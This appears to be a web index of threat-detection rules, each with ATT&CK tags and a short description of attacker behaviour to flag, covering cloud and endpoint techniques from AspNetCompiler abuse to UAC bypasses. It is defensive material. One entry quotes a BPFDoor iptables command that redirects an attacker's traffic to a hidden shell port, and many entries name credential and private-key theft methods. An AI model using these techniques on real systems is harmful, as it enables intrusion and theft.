Aug 12, 2024 · attack.defense-evasion attack.t1127 ·
Share on:

Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.

Read More
Assembly DLL Creation Via AspNetCompiler

Aug 12, 2024 · attack.execution ·
Share on:

Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.

Read More
Assembly Loading Via CL_LoadAssembly.ps1

Aug 12, 2024 · attack.defense-evasion attack.t1216 ·
Share on:

Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls.

Read More
Atbroker Registry Change

Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.persistence attack.t1547 ·
Share on:

Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'

Read More
Atera Agent Installation

Aug 12, 2024 · attack.t1219 ·
Share on:

Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators

Read More
Atlassian Bitbucket Command Injection Via Archive API

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-36804 detection.emerging-threats ·
Share on:

Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804

Read More
Atlassian Confluence CVE-2022-26134

Aug 12, 2024 · attack.initial-access attack.execution attack.t1190 attack.t1059 cve.2022-26134 ·
Share on:

Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134

Read More
Atypical Travel

Aug 12, 2024 · attack.t1078 attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access ·
Share on:

Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.

Read More
Audio Capture

Aug 12, 2024 · attack.collection attack.t1123 ·
Share on:

Detects attempts to record audio with arecord utility

Read More
Audio Capture via PowerShell

Aug 12, 2024 · attack.collection attack.t1123 ·
Share on:

Detects audio capture via PowerShell Cmdlet.

Read More
Audio Capture via SoundRecorder

Aug 12, 2024 · attack.collection attack.t1123 ·
Share on:

Detect attacker collecting audio via SoundRecorder application.

Read More
Audit CVE Event

Aug 12, 2024 · attack.execution attack.t1203 attack.privilege-escalation attack.t1068 attack.defense-evasion attack.t1211 attack.credential-access attack.t1212 attack.lateral-movement attack.t1210 attack.impact attack.t1499.004 ·
Share on:

Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.

Read More
Audit Policy Tampering Via Auditpol

Aug 12, 2024 · attack.defense-evasion attack.t1562.002 ·
Share on:

Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

Read More
Audit Policy Tampering Via NT Resource Kit Auditpol

Aug 12, 2024 · attack.defense-evasion attack.t1562.002 ·
Share on:

Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

Read More
Auditing Configuration Changes on Linux Host

Aug 12, 2024 · attack.defense-evasion attack.t1562.006 ·
Share on:

Detect changes in auditd configuration files

Read More
Authentications To Important Apps Using Single Factor Authentication

Aug 12, 2024 · attack.initial-access attack.t1078 ·
Share on:

Detect when authentications to important application(s) only required single-factor authentication

Read More
Automated Collection Bookmarks Using Get-ChildItem PowerShell

Aug 12, 2024 · attack.discovery attack.t1217 ·
Share on:

Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

Read More
Automated Collection Command PowerShell

Aug 12, 2024 · attack.collection attack.t1119 ·
Share on:

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

Read More
Automated Collection Command Prompt

Aug 12, 2024 · attack.collection attack.t1119 attack.credential-access attack.t1552.001 ·
Share on:

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

Read More
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl

Aug 12, 2024 · attack.defense-evasion attack.t1216 ·
Share on:

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

Read More
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File

Aug 12, 2024 · attack.defense-evasion attack.t1216 ·
Share on:

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

Read More
AWS Attached Malicious Lambda Layer

Aug 12, 2024 · attack.privilege-escalation ·
Share on:

Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.

Read More
AWS CloudTrail Important Change

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects disabling, deleting and updating of a Trail

Read More
AWS Config Disabling Channel/Recorder

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects AWS Config Service disabling

Read More
AWS EC2 Disable EBS Encryption

Aug 12, 2024 · attack.impact attack.t1486 attack.t1565 ·
Share on:

Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes.

Read More
AWS EC2 Startup Shell Script Change

Aug 12, 2024 · attack.execution attack.t1059.001 attack.t1059.003 attack.t1059.004 ·
Share on:

Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.

Read More
AWS EC2 VM Export Failure

Aug 12, 2024 · attack.collection attack.t1005 attack.exfiltration attack.t1537 ·
Share on:

An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.

Read More
AWS ECS Task Definition That Queries The Credential Endpoint

Aug 12, 2024 · attack.persistence attack.t1525 ·
Share on:

Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.

Read More
AWS EFS Fileshare Modified or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.

Read More
AWS EFS Fileshare Mount Modified or Deleted

Aug 12, 2024 · attack.impact attack.t1485 ·
Share on:

Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.

Read More
AWS EKS Cluster Created or Deleted

Aug 12, 2024 · attack.impact attack.t1485 ·
Share on:

Identifies when an EKS cluster is created or deleted.

Read More
AWS ElastiCache Security Group Created

Aug 12, 2024 · attack.persistence attack.t1136 attack.t1136.003 ·
Share on:

Detects when an ElastiCache security group has been created.

Read More
AWS ElastiCache Security Group Modified or Deleted

Aug 12, 2024 · attack.impact attack.t1531 ·
Share on:

Identifies when an ElastiCache security group has been modified or deleted.

Read More
AWS Glue Development Endpoint Activity

Aug 12, 2024 · attack.privilege-escalation ·
Share on:

Detects possible suspicious glue development endpoint activity.

Read More
AWS GuardDuty Important Change

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.

Read More
AWS IAM Backdoor Users Keys

Aug 12, 2024 · attack.persistence attack.t1098 ·
Share on:

Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org.

Read More
AWS IAM S3Browser LoginProfile Creation

Aug 12, 2024 · attack.execution attack.persistence attack.t1059.009 attack.t1078.004 ·
Share on:

Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.

Read More
AWS IAM S3Browser Templated S3 Bucket Policy Creation

Aug 12, 2024 · attack.execution attack.t1059.009 attack.persistence attack.t1078.004 ·
Share on:

Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "".

Read More
AWS IAM S3Browser User or AccessKey Creation

Aug 12, 2024 · attack.execution attack.persistence attack.t1059.009 attack.t1078.004 ·
Share on:

Detects S3 Browser utility creating IAM User or AccessKey.

Read More
AWS Identity Center Identity Provider Change

Aug 12, 2024 · attack.persistence attack.t1556 ·
Share on:

Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider. A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.

Read More
AWS RDS Master Password Change

Aug 12, 2024 · attack.exfiltration attack.t1020 ·
Share on:

Detects the change of database master password. It may be a part of data exfiltration.

Read More
AWS Root Credentials

Aug 12, 2024 · attack.privilege-escalation attack.t1078.004 ·
Share on:

Detects AWS root account usage

Read More
AWS Route 53 Domain Transfer Lock Disabled

Aug 12, 2024 · attack.persistence attack.credential-access attack.t1098 ·
Share on:

Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.

Read More
AWS Route 53 Domain Transferred to Another Account

Aug 12, 2024 · attack.persistence attack.credential-access attack.t1098 ·
Share on:

Detects when a request has been made to transfer a Route 53 domain to another AWS account.

Read More
AWS S3 Data Management Tampering

Aug 12, 2024 · attack.exfiltration attack.t1537 ·
Share on:

Detects when a user tampers with S3 data management in Amazon Web Services.

Read More
AWS SecurityHub Findings Evasion

Aug 12, 2024 · attack.defense-evasion attack.t1562 ·
Share on:

Detects the modification of the findings on SecurityHub.

Read More
AWS Snapshot Backup Exfiltration

Aug 12, 2024 · attack.exfiltration attack.t1537 ·
Share on:

Detects the modification of an EC2 snapshot's permissions to enable access from another account

Read More
AWS STS AssumeRole Misuse

Aug 12, 2024 · attack.lateral-movement attack.privilege-escalation attack.t1548 attack.t1550 attack.t1550.001 ·
Share on:

Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.

Read More
AWS STS GetSessionToken Misuse

Aug 12, 2024 · attack.lateral-movement attack.privilege-escalation attack.t1548 attack.t1550 attack.t1550.001 ·
Share on:

Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.

Read More
AWS Suspicious SAML Activity

Aug 12, 2024 · attack.initial-access attack.t1078 attack.lateral-movement attack.t1548 attack.privilege-escalation attack.t1550 attack.t1550.001 ·
Share on:

Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.

Read More
AWS User Login Profile Was Modified

Aug 12, 2024 · attack.persistence attack.t1098 ·
Share on:

Detects activity when someone is changing passwords on behalf of other users. An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.

Read More
Azure Active Directory Hybrid Health AD FS New Server

Aug 12, 2024 · attack.defense-evasion attack.t1578 ·
Share on:

This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure.

Read More
Azure Active Directory Hybrid Health AD FS Service Delete

Aug 12, 2024 · attack.defense-evasion attack.t1578.003 ·
Share on:

This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.

Read More
Azure AD Account Credential Leaked

Aug 12, 2024 · attack.t1589 attack.reconnaissance ·
Share on:

Indicates that the user's valid credentials have been leaked.

Read More
Azure AD Health Monitoring Agent Registry Keys Access

Aug 12, 2024 · attack.discovery attack.t1012 ·
Share on:

This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.

Read More
Azure AD Health Service Agents Registry Keys Access

Aug 12, 2024 · attack.discovery attack.t1012 ·
Share on:

This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys.

Read More
Azure AD Only Single Factor Authentication Required

Aug 12, 2024 · attack.initial-access attack.credential-access attack.t1078.004 attack.t1556.006 ·
Share on:

Detect when users are authenticating without MFA being required.

Read More
Azure AD Threat Intelligence

Aug 12, 2024 · attack.t1078 attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access ·
Share on:

Indicates user activity that is unusual for the user or consistent with known attack patterns.

Read More
Azure Application Credential Modified

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a application credential is modified.

Read More
Azure Application Deleted

Aug 12, 2024 · attack.defense-evasion attack.impact attack.t1489 ·
Share on:

Identifies when a application is deleted in Azure.

Read More
Azure Application Gateway Modified or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a application gateway is modified or deleted.

Read More
Azure Application Security Group Modified or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a application security group is modified or deleted.

Read More
Azure Container Registry Created or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Detects when a Container Registry is created or deleted.

Read More
Azure Device No Longer Managed or Compliant

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a device in azure is no longer managed or compliant

Read More
Azure Device or Configuration Modified or Deleted

Aug 12, 2024 · attack.impact attack.t1485 attack.t1565.001 ·
Share on:

Identifies when a device or device configuration in azure is modified or deleted.

Read More
Azure DNS Zone Modified or Deleted

Aug 12, 2024 · attack.impact attack.t1565.001 ·
Share on:

Identifies when DNS zone is modified or deleted.

Read More
Azure Domain Federation Settings Modified

Aug 12, 2024 · attack.initial-access attack.t1078 ·
Share on:

Identifies when an user or application modified the federation settings on the domain.

Read More
Azure Firewall Modified or Deleted

Aug 12, 2024 · attack.impact attack.defense-evasion attack.t1562.004 ·
Share on:

Identifies when a firewall is created, modified, or deleted.

Read More
Azure Firewall Rule Collection Modified or Deleted

Aug 12, 2024 · attack.impact attack.defense-evasion attack.t1562.004 ·
Share on:

Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.

Read More
Azure Firewall Rule Configuration Modified or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a Firewall Rule Configuration is Modified or Deleted.

Read More
Azure Key Vault Modified or Deleted

Aug 12, 2024 · attack.impact attack.credential-access attack.t1552 attack.t1552.001 ·
Share on:

Identifies when a key vault is modified or deleted.

Read More
Azure Keyvault Key Modified or Deleted

Aug 12, 2024 · attack.impact attack.credential-access attack.t1552 attack.t1552.001 ·
Share on:

Identifies when a Keyvault Key is modified or deleted in Azure.

Read More
Azure Keyvault Secrets Modified or Deleted

Aug 12, 2024 · attack.impact attack.credential-access attack.t1552 attack.t1552.001 ·
Share on:

Identifies when secrets are modified or deleted in Azure.

Read More
Azure Kubernetes Admission Controller

Aug 12, 2024 · attack.persistence attack.t1078 attack.credential-access attack.t1552 attack.t1552.007 ·
Share on:

Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.

Read More
Azure Kubernetes Cluster Created or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Detects when a Azure Kubernetes Cluster is created or deleted.

Read More
Azure Kubernetes CronJob

Aug 12, 2024 · attack.persistence attack.t1053.003 attack.privilege-escalation attack.execution ·
Share on:

Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.

Read More
Azure Kubernetes Events Deleted

Aug 12, 2024 · attack.defense-evasion attack.t1562 attack.t1562.001 ·
Share on:

Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.

Read More
Azure Kubernetes Network Policy Change

Aug 12, 2024 · attack.impact attack.credential-access ·
Share on:

Identifies when a Azure Kubernetes network policy is modified or deleted.

Read More
Azure Kubernetes Pods Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Identifies the deletion of Azure Kubernetes Pods.

Read More
Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted

Aug 12, 2024 · attack.impact attack.credential-access ·
Share on:

Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.

Read More
Azure Kubernetes Secret or Config Object Access

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.

Read More
Azure Kubernetes Sensitive Role Access

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when ClusterRoles/Roles are being modified or deleted.

Read More
Azure Kubernetes Service Account Modified or Deleted

Aug 12, 2024 · attack.impact attack.t1531 ·
Share on:

Identifies when a service account is modified or deleted.

Read More
Azure Network Firewall Policy Modified or Deleted

Aug 12, 2024 · attack.impact attack.defense-evasion attack.t1562.007 ·
Share on:

Identifies when a Firewall Policy is Modified or Deleted.

Read More
Azure Network Security Configuration Modified or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a network security configuration is modified or deleted.

Read More
Azure New CloudShell Created

Aug 12, 2024 · attack.execution attack.t1059 ·
Share on:

Identifies when a new cloudshell is created inside of Azure portal.

Read More
Azure Owner Removed From Application or Service Principal

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Identifies when a owner is was removed from a application or service principal in Azure.

Read More
Azure Point-to-site VPN Modified or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a Point-to-site VPN is Modified or Deleted.

Read More
Azure Service Principal Created

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Identifies when a service principal is created in Azure.

Read More
Azure Service Principal Removed

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Identifies when a service principal was removed in Azure.

Read More
Azure Subscription Permission Elevation Via ActivityLogs

Aug 12, 2024 · attack.initial-access attack.t1078.004 ·
Share on:

Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.

Read More
Azure Subscription Permission Elevation Via AuditLogs

Aug 12, 2024 · attack.initial-access attack.t1078 ·
Share on:

Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.

Read More
Azure Suppression Rule Created

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.

Read More
Azure Unusual Authentication Interruption

Aug 12, 2024 · attack.initial-access attack.t1078 ·
Share on:

Detects when there is a interruption in the authentication process.

Read More
Azure Virtual Network Device Modified or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router.

Read More
Azure Virtual Network Modified or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a Virtual Network is modified or deleted in Azure.

Read More
Azure VPN Connection Modified or Deleted

Aug 12, 2024 · attack.impact ·
Share on:

Identifies when a VPN connection is modified or deleted.

Read More
Backup Catalog Deleted

Aug 12, 2024 · attack.defense-evasion attack.t1070.004 ·
Share on:

Detects backup catalog deletions

Read More
Bad Opsec Powershell Code Artifacts

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.

Read More
Base64 Encoded PowerShell Command Detected

Aug 12, 2024 · attack.t1027 attack.defense-evasion attack.t1140 attack.t1059.001 ·
Share on:

Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string

Read More
Base64 MZ Header In CommandLine

Aug 12, 2024 · attack.execution ·
Share on:

Detects encoded base64 MZ header in the commandline

Read More
Bash Interactive Shell

Aug 12, 2024 · attack.execution ·
Share on:

Detects execution of the bash shell with the interactive flag "-i".

Read More
Binary Padding - Linux

Aug 12, 2024 · attack.defense-evasion attack.t1027.001 ·
Share on:

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.

Read More
Binary Padding - MacOS

Aug 12, 2024 · attack.defense-evasion attack.t1027.001 ·
Share on:

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.

Read More
Bitlocker Key Retrieval

Aug 12, 2024 · attack.defense-evasion attack.t1078.004 ·
Share on:

Monitor and alert for Bitlocker key retrieval.

Read More
BitLockerTogo.EXE Execution

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. This is a rarely used application and usage of it at all is worth investigating. Malware such as Lumma stealer has been seen using this process as a target for process hollowing.

Read More
BITS Transfer Job Download From Direct IP

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 ·
Share on:

Detects a BITS transfer job downloading file(s) from a direct IP address.

Read More
BITS Transfer Job Download To Potential Suspicious Folder

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 ·
Share on:

Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location

Read More
BITS Transfer Job Downloading File Potential Suspicious Extension

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 ·
Share on:

Detects new BITS transfer job saving local files with potential suspicious extensions

Read More
Bitsadmin to Uncommon IP Server Address

Aug 12, 2024 · attack.command-and-control attack.t1071.001 attack.defense-evasion attack.persistence attack.t1197 attack.s0190 ·
Share on:

Detects Bitsadmin connections to IP addresses instead of FQDN names

Read More
Bitsadmin to Uncommon TLD

Aug 12, 2024 · attack.command-and-control attack.t1071.001 attack.defense-evasion attack.persistence attack.t1197 attack.s0190 ·
Share on:

Detects Bitsadmin connections to domains with uncommon TLDs

Read More
Blackbyte Ransomware Registry

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption

Read More
BloodHound Collection Files

Aug 12, 2024 · attack.discovery attack.t1087.001 attack.t1087.002 attack.t1482 attack.t1069.001 attack.t1069.002 attack.execution attack.t1059.001 ·
Share on:

Detects default file names outputted by the BloodHound collection tool SharpHound

Read More
Blue Mockingbird

Aug 12, 2024 · attack.execution attack.t1112 attack.t1047 detection.emerging-threats ·
Share on:

Attempts to detect system changes made by Blue Mockingbird

Read More
Blue Mockingbird - Registry

Aug 12, 2024 · attack.execution attack.t1112 attack.t1047 ·
Share on:

Attempts to detect system changes made by Blue Mockingbird

Read More
BlueSky Ransomware Artefacts

Aug 12, 2024 · attack.impact attack.t1486 detection.emerging-threats ·
Share on:

Detect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt.

Read More
Boot Configuration Tampering Via Bcdedit.EXE

Aug 12, 2024 · attack.impact attack.t1490 ·
Share on:

Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.

Read More
BPFDoor Abnormal Process ID or Lock File Accessed

Aug 12, 2024 · attack.execution attack.t1106 attack.t1059 ·
Share on:

detects BPFDoor .lock and .pid files access in temporary file storage facility

Read More
Bpfdoor TCP Ports Redirect

Aug 12, 2024 · attack.defense-evasion attack.t1562.004 ·
Share on:

All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392' The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.

Read More
BPFtrace Unsafe Option Usage

Aug 12, 2024 · attack.execution attack.t1059.004 ·
Share on:

Detects the usage of the unsafe bpftrace option

Read More
Browser Execution In Headless Mode

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects execution of Chromium based browser in headless mode

Read More
Browser Started with Remote Debugging

Aug 12, 2024 · attack.credential-access attack.t1185 ·
Share on:

Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks

Read More
Buffer Overflow Attempts

Aug 12, 2024 · attack.t1068 attack.privilege-escalation ·
Share on:

Detects buffer overflow attempts in Unix system log files

Read More
Bulk Deletion Changes To Privileged Account Permissions

Aug 12, 2024 · attack.persistence attack.t1098 ·
Share on:

Detects when a user is removed from a privileged role. Bulk changes should be investigated.

Read More
Bypass UAC Using DelegateExecute

Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002 ·
Share on:

Bypasses User Account Control using a fileless method

Read More
Bypass UAC Using Event Viewer

Aug 12, 2024 · attack.persistence attack.t1547.010 ·
Share on:

Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification

Read More
Bypass UAC Using SilentCleanup Task

Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002 ·
Share on:

Detects the setting of the environement variable "windir" to a non default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.

Read More
Bypass UAC via CMSTP

Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002 attack.t1218.003 ·
Share on:

Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files

Read More
Bypass UAC via Fodhelper.exe

Aug 12, 2024 · attack.privilege-escalation attack.t1548.002 ·
Share on:

Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.

Read More
Bypass UAC via WSReset.exe

Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002 ·
Share on:

Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.

Read More
C# IL Code Compilation Via Ilasm.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1127 ·
Share on:

Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL.

Read More
CA Policy Removed by Non Approved Actor

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1548 attack.t1556 ·
Share on:

Monitor and alert on conditional access changes where non approved actor removed CA Policy.

Read More
CA Policy Updated by Non Approved Actor

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1548 attack.t1556 ·
Share on:

Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare "old" vs "new" value.

Read More
Capabilities Discovery - Linux

Aug 12, 2024 · attack.discovery attack.t1083 ·
Share on:

Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.

Read More
Capture Credentials with Rpcping.exe

Aug 12, 2024 · attack.credential-access attack.t1003 ·
Share on:

Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.

Read More
Cat Sudoers

Aug 12, 2024 · attack.reconnaissance attack.t1592.004 ·
Share on:

Detects the execution of a cat /etc/sudoers to list all users that have sudo rights

Read More
Certificate Exported From Local Certificate Store

Aug 12, 2024 · attack.credential-access attack.t1649 ·
Share on:

Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.

Read More
Certificate Exported Via Certutil.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1027 ·
Share on:

Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.

Read More
Certificate Exported Via PowerShell

Aug 12, 2024 · attack.credential-access attack.execution attack.t1552.004 attack.t1059.001 ·
Share on:

Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

Read More
Certificate Exported Via PowerShell - ScriptBlock

Aug 12, 2024 · attack.credential-access attack.t1552.004 ·
Share on:

Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

Read More
Certificate Private Key Acquired

Aug 12, 2024 · attack.credential-access attack.t1649 ·
Share on:

Detects when an application acquires a certificate private key

Read More
Certificate Request Export to Exchange Webserver

Aug 12, 2024 · attack.persistence attack.t1505.003 ·
Share on:

Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell

Read More
Certificate-Based Authentication Enabled

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1556 ·
Share on:

Detects when certificate based authentication has been enabled in an Azure Active Directory tenant.

Read More
Chafer Malware URL Pattern

Aug 12, 2024 · attack.command-and-control attack.t1071.001 ·
Share on:

Detects HTTP request used by Chafer malware to receive data from its C2.

Read More
Change Default File Association To Executable Via Assoc

Aug 12, 2024 · attack.persistence attack.t1546.001 ·
Share on:

